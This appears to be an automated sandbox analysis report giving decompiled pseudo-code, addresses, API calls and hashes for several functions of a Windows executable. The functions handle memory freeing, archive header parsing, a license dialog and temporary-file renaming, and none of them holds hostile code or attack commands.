			E001B8422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x1c4be0) {
					E001B7A50(_t52);
					_t26 = _a4;
				}
				E001B7A50( *((intOrPtr*)(_t26 + 0x3c)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x30)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x34)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x38)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x28)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x2c)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x40)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x44)));
				E001B7A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E001B82E8(5,  &_v8);
				_v8 =  &_a4;
				return E001B8338(4,  &_v8);
			}

0x001b8428
0x001b842b
0x001b8433
0x001b8436
0x001b843b
0x001b843e
0x001b8442
0x001b844d
0x001b8458
0x001b8463
0x001b846e
0x001b8479
0x001b8484
0x001b848f
0x001b849d
0x001b84a5
0x001b84ae
0x001b84b6
0x001b84ca

APIs

_free.LIBCMT ref: 001B8436

Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78

_free.LIBCMT ref: 001B8442
_free.LIBCMT ref: 001B844D
_free.LIBCMT ref: 001B8458
_free.LIBCMT ref: 001B8463
_free.LIBCMT ref: 001B846E
_free.LIBCMT ref: 001B8479
_free.LIBCMT ref: 001B8484
_free.LIBCMT ref: 001B848F
_free.LIBCMT ref: 001B849D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11013c8a1fa14b2dc38f7073fdd6fd4b0a88d97011bfbc6aade75d4694ed5b9a
Instruction ID: 99f814d0cc728107abc8b67113c85093a65bf6a328fb45aa96599089d5bbffb7
Opcode Fuzzy Hash: 11013c8a1fa14b2dc38f7073fdd6fd4b0a88d97011bfbc6aade75d4694ed5b9a
Instruction Fuzzy Hash: F211A276104108EFCB41EFB4C882DDE3BA9EF54350B4591A5FA199B2A2DB31EF50DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0019200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0019200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E001AD940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0019C39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0019C39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0019C39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0019C39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0019C39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0019C39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0019C39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0019C251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00193E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00193DEC(_t257, _t240 + 0x28, _t167);
												}
												E0019C300(_t318, _t240 + 0x10a1, 0x10);
												E0019C300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0019C300(_t318, _t240 + 0x10c2, 8);
													E0019C300(_t318, _t344 + 0x30, 4);
													E0019F524(_t344 + 0x58);
													E0019F56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0019F435(_t344 + 0x5c);
													_t161 = E001AF3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E001AF3CA(_t325, 0x1c2398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00193E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00193DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0019C39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0019C300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0019C39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E001A0A64(_t240 + 0x1040, _t315, E0019C2E0(_t278, __eflags), _t315);
													} else {
														E001A0A25(_t240 + 0x1040, _t315, E0019C29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E001A0A64(_t240 + 0x1048, _t315, E0019C2E0(_t275, __eflags), _t315);
													} else {
														E001A0A25(_t240 + 0x1048, _t315, E0019C29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E001A0A64(_t240 + 0x1050, _t315, E0019C2E0(_t272, __eflags), _t315);
													} else {
														E001A0A25(_t240 + 0x1050, _t315, E0019C29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0019C29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E001A06D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0019C29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E001A06D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0019C29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E001A06D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0019C39E(_t315);
												__eflags = E0019C39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00193E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0019FA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0019C39E(_t315);
											 *(_t240 + 0x2104) = E0019C39E(_t315) & 0x00000001;
											_t331 = E0019C39E(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0019C300(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0019B9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E001A1094();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0019C39E(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0019C39E(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0019C300(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0019C39E(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0019C300(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0019C39E(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0019C39E(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E00191EDE(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x00192011
0x00192017
0x0019201e
0x00192022
0x00192027
0x00192031
0x00192688
0x0019268f
0x0019268f
0x00192037
0x00192039
0x0019203f
0x00192046
0x0019204f
0x00192051
0x00192056
0x00192058
0x0019205a
0x00000000
0x00000000
0x0019206d
0x00192070
0x00192072
0x00000000
0x00000000
0x00192078
0x0019207a
0x00000000
0x0019208a
0x0019208a
0x0019208f
0x00192093
0x00192098
0x0019209b
0x0019209d
0x0019209f
0x001920a1
0x001920a5
0x001920a9
0x00000000
0x001920b9
0x001920bd
0x001920ce
0x001920d2
0x001920d7
0x001920dd
0x001920e1
0x001920ea
0x00192102
0x00192104
0x00192107
0x00192107
0x0019210a
0x0019210a
0x00192110
0x00192114
0x0019211d
0x00192135
0x00192137
0x0019213a
0x0019213a
0x0019211d
0x0019213d
0x00192141
0x00192141
0x00192149
0x00192155
0x00192157
0x00000000
0x00192168
0x00192168
0x0019216b
0x0019251a
0x0019251f
0x00192521
0x00192551
0x0019255f
0x00192567
0x00192572
0x00192575
0x0019257b
0x0019257e
0x0019258d
0x00192592
0x00192596
0x0019259a
0x001925a2
0x001925a2
0x001925b2
0x001925c2
0x001925c7
0x001925ce
0x001925d6
0x001925df
0x001925ed
0x001925f7
0x00192604
0x0019260d
0x00192613
0x00192624
0x00192629
0x0019262e
0x00192632
0x00192636
0x0019263c
0x00192646
0x0019264b
0x0019264e
0x00192650
0x00192652
0x00192652
0x00192650
0x0019263c
0x00192658
0x0019265f
0x00192669
0x00192523
0x00192530
0x00192535
0x00192539
0x0019253d
0x00192545
0x00192545
0x00000000
0x00192521
0x00192171
0x00192174
0x001924f3
0x001924f8
0x001924fa
0x00000000
0x00000000
0x00192500
0x00192508
0x00192512
0x001921c9
0x001921cb
0x00000000
0x001921cb
0x0019217a
0x0019217d
0x00192374
0x00192376
0x00000000
0x00000000
0x0019237c
0x00192387
0x00192389
0x0019238e
0x00192392
0x00192394
0x0019239a
0x0019239e
0x0019239e
0x001923a1
0x001923a5
0x001923a7
0x001923a9
0x001923ab
0x001923cf
0x001923ad
0x001923bb
0x001923bb
0x001923d4
0x001923d8
0x001923d8
0x001923dc
0x001923dc
0x001923df
0x001923e3
0x001923e5
0x001923e7
0x001923e9
0x0019240d
0x001923eb
0x001923f9
0x001923f9
0x001923e9
0x00192412
0x00192418
0x00192418
0x0019241b
0x0019241f
0x00192421
0x00192426
0x00192428
0x0019244c
0x0019242a
0x00192438
0x00192438
0x00192451
0x00192451
0x00192455
0x0019245a
0x00192460
0x00192462
0x00192468
0x0019246d
0x00192496
0x0019249b
0x0019246f
0x00192471
0x00192476
0x0019247b
0x00192480
0x00192482
0x00192484
0x0019248f
0x0019248f
0x00192484
0x001924a0
0x001924a5
0x001924ae
0x001924b0
0x001924b2
0x001924bd
0x001924bd
0x001924b2
0x001924c2
0x001924c7
0x001924d4
0x001924d6
0x001924d8
0x001924e7
0x001924e7
0x001924d8
0x001924c7
0x00192462
0x00000000
0x0019245a
0x0019237e
0x00192381
0x00000000
0x00000000
0x00000000
0x00192381
0x00192183
0x00192186
0x00192317
0x00192319
0x00000000
0x00000000
0x0019231f
0x0019232a
0x0019232c
0x00192338
0x0019233a
0x0019234a
0x00192354
0x00192359
0x0019236a
0x0019236a
0x00000000
0x0019233a
0x00192321
0x00192324
0x00000000
0x00000000
0x00000000
0x00192324
0x0019218c
0x0019218f
0x001922a2
0x001922b1
0x001922bc
0x001922be
0x001922c6
0x001922cc
0x001922d9
0x001922de
0x001922de
0x001922f4
0x001922f9
0x00192304
0x0019230c
0x0019230d
0x00000000
0x0019230d
0x00192195
0x00192198
0x001921d7
0x001921de
0x001921e5
0x001921ee
0x001921fc
0x00192202
0x00192209
0x0019220d
0x0019220f
0x00192218
0x0019221f
0x00192221
0x00192223
0x00192223
0x00192229
0x0019222e
0x00192232
0x00192232
0x00192236
0x00192238
0x00192241
0x00192248
0x0019224a
0x0019224c
0x0019224c
0x0019224f
0x00192258
0x0019225d
0x0019225d
0x00192261
0x00192268
0x00192271
0x00192271
0x00192277
0x0019227e
0x00192287
0x00192287
0x0019228d
0x00000000
0x0019228d
0x0019219d
0x00000000
0x00000000
0x001921a7
0x001921b5
0x001921b5
0x001921b8
0x001921c1
0x001921c6
0x001921c7
0x00000000
0x001921c7
0x00192670
0x00192670
0x00192670
0x00192674
0x0019267a
0x0019267f
0x00000000
0x00000000
0x00000000
0x0019267f
0x00192149
0x001920a9
0x0019207a
0x00192687

Strings

xc%u, xrefs: 00192581
x%u, xrefs: 00192524
;%u, xrefs: 00192341

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: aaa12f36ca797bcac1f1cb068ba24652aa0c9a16f15eaf8aab724aab174ef260
Instruction ID: 12228bb0c35e74af4418396f734f32fbacf65735df37e30daaa160ba0c776dee
Opcode Fuzzy Hash: aaa12f36ca797bcac1f1cb068ba24652aa0c9a16f15eaf8aab724aab174ef260
Instruction Fuzzy Hash: 46F12471604340ABDF25EF248895BFE77E9AFA4300F084579FD858B287DB749948C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 001AA3E1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E001AA3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				intOrPtr _t31;
				struct HWND__* _t35;
				intOrPtr _t36;
				void* _t37;
				struct HWND__* _t38;

				_t28 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				if(E001912D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t37 = _t36 - 0x110;
				if(_t37 == 0) {
					E001AC343(__edx, __eflags, __fp0, _t35);
					_t9 =  *0x1db704;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t35, 0x80, 1, _t9);
					}
					_t10 =  *0x1e5d04;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x1ede1c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t35, _t11);
					}
					_t38 = GetDlgItem(_t35, 0x65);
					SendMessageW(_t38, 0x435, 0, 0x10000);
					SendMessageW(_t38, 0x443, 0,  *0x1cdf40(0xf));
					 *0x1cdf3c(_t35);
					_t31 =  *0x1d75ec; // 0x0
					E001A8FE6(_t31, __eflags,  *0x1d0064, _t38,  *0x1ede18, 0, 0);
					L001B2B4E( *0x1ede1c);
					L001B2B4E( *0x1ede18);
					goto L16;
				}
				if(_t37 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t35, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x001aa3e2
0x001aa3e8
0x001aa3ef
0x001aa408
0x001aa4ee
0x001aa4f0
0x00000000
0x001aa4f0
0x001aa40e
0x001aa414
0x001aa441
0x001aa446
0x001aa451
0x001aa453
0x001aa45e
0x001aa45e
0x001aa460
0x001aa465
0x001aa467
0x001aa473
0x001aa473
0x001aa479
0x001aa47e
0x001aa480
0x001aa484
0x001aa484
0x001aa499
0x001aa4a1
0x001aa4b3
0x001aa4b6
0x001aa4bc
0x001aa4d1
0x001aa4dc
0x001aa4e7
0x00000000
0x001aa4ed
0x001aa419
0x001aa428
0x00000000
0x001aa428
0x001aa41e
0x001aa421
0x001aa43c
0x001aa430
0x001aa431
0x00000000
0x001aa431
0x001aa426
0x001aa42f
0x00000000
0x001aa42f
0x00000000

APIs

Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

EndDialog.USER32(?,00000001), ref: 001AA431
SendMessageW.USER32(?,00000080,00000001,?), ref: 001AA45E
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001AA473
SetWindowTextW.USER32(?,?), ref: 001AA484
GetDlgItem.USER32(?,00000065), ref: 001AA48D
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001AA4A1
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001AA4B3

Strings

LICENSEDLG, xrefs: 001AA3F5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: d9ef8a3b4b1ffda6f856c231e8a99e854de580e9f75f6b6e991f770ee9f0247d
Instruction ID: 936096a83d83f9532e7d126e8998e279206dd0d6ceed0467661a13073918e4c2
Opcode Fuzzy Hash: d9ef8a3b4b1ffda6f856c231e8a99e854de580e9f75f6b6e991f770ee9f0247d
Instruction Fuzzy Hash: 4921BF362442147BE2115B75ED8DF7B7BACEF5BB84F454018F601AA4A0CBA29C82D672

Uniqueness

Uniqueness Score: -1.00%

Function 00199268, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00199268(void* __ecx) {
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t82;
				WCHAR* _t83;
				void* _t85;
				void* _t87;

				E001AD870(E001C1336, _t85);
				E001AD940();
				_t83 =  *(_t85 + 8);
				_t31 = _t85 - 0x4030;
				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t92 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *(_t85 + 8) = E0019B943(_t92, _t85 - 0x4030);
							_t78 = E0019B943(_t92, _t85 - 0x5030);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E001A1410( *(_t85 + 8), _t78);
								_t94 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E001A1410(E0019B943(_t94, _t83), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t85 - 0x100c) = _t41;
										_t79 = 0;
										while(1) {
											_t96 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0019FAB1(_t85 - 0x100c, _t83, 0x800);
											E00193E41(E0019B943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
											_t87 = _t87 + 0x10;
											if(E00199E6B(_t85 - 0x100c) == 0) {
												_t41 =  *(_t85 - 0x100c);
											} else {
												_t41 = 0;
												 *(_t85 - 0x100c) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t99 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0019FAB1(_t85 - 0x3030, _t83, 0x800);
										_push(0x800);
										E0019B9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
											goto L20;
										} else {
											E0019943C(_t85 - 0x2030);
											 *((intOrPtr*)(_t85 - 4)) = _t68;
											if(E00199E6B(_t83) == 0) {
												_push(0x12);
												_push(_t83);
												_t68 = E00199528(_t85 - 0x2030);
											}
											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
											if(_t68 != 0) {
												E001994DA(_t85 - 0x2030);
												E00199621(_t85 - 0x2030);
											}
											E0019946E(_t85 - 0x2030);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
				return _t32;
			}

0x0019926d
0x00199277
0x0019927e
0x00199281
0x00199290
0x00199298
0x00199427
0x00199427
0x00199427
0x001992a6
0x001992af
0x001992b7
0x00000000
0x001992bd
0x001992bd
0x001992bf
0x00000000
0x001992c5
0x001992d1
0x001992e0
0x001992e2
0x001992e7
0x00000000
0x001992ed
0x001992f1
0x001992f6
0x001992f8
0x00000000
0x001992fe
0x00199306
0x0019930d
0x00000000
0x00199313
0x00199313
0x0019931a
0x0019931c
0x0019931c
0x0019931f
0x00000000
0x00000000
0x0019932e
0x0019934b
0x00199350
0x00199361
0x0019936e
0x00199363
0x00199363
0x00199365
0x00199365
0x00199375
0x0019937e
0x00000000
0x00199380
0x00199380
0x00199383
0x00000000
0x00000000
0x00000000
0x00000000
